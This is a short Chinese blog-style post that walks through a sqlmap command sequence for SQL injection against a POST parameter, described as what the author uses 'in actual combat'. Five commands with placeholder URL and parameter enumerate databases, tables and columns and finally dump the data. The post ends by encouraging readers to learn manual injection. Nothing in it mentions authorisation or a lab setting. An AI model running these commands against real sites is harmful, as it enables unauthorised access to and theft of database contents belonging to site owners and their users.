直接进入正题:
环境:python2.7
先贴以一个我在实战中的使用:
python2 sqlmap.py -u “这里插入url地址” --data=“这里是注入点的变量名=1”
python2 sqlmap.py -u “这里插入url地址” --data=“这里是注入点的变量名=1” --dbs 爆数据库库名
python2 sqlmap.py -u “这里插入url地址” --data=“这里是注入点的变量名=1” -D 数据库名 --tables 爆数据库表明
python2 sqlmap.py -u “这里插入url地址” --data=“这里是注入点的变量名=1” -D 数据库名 -T 表名 --columns 爆列名
python2 sqlmap.py -u “这里插入url地址” --data=“这里是注入点的变量名=1” -D 数据库名 -T 表名 -C 列名 --dump 取得这里的数据
用sqlmap爆破是没有灵魂的,希望大家多多手工注入,
不要像我一样是一个sql注入菜鸟。
共勉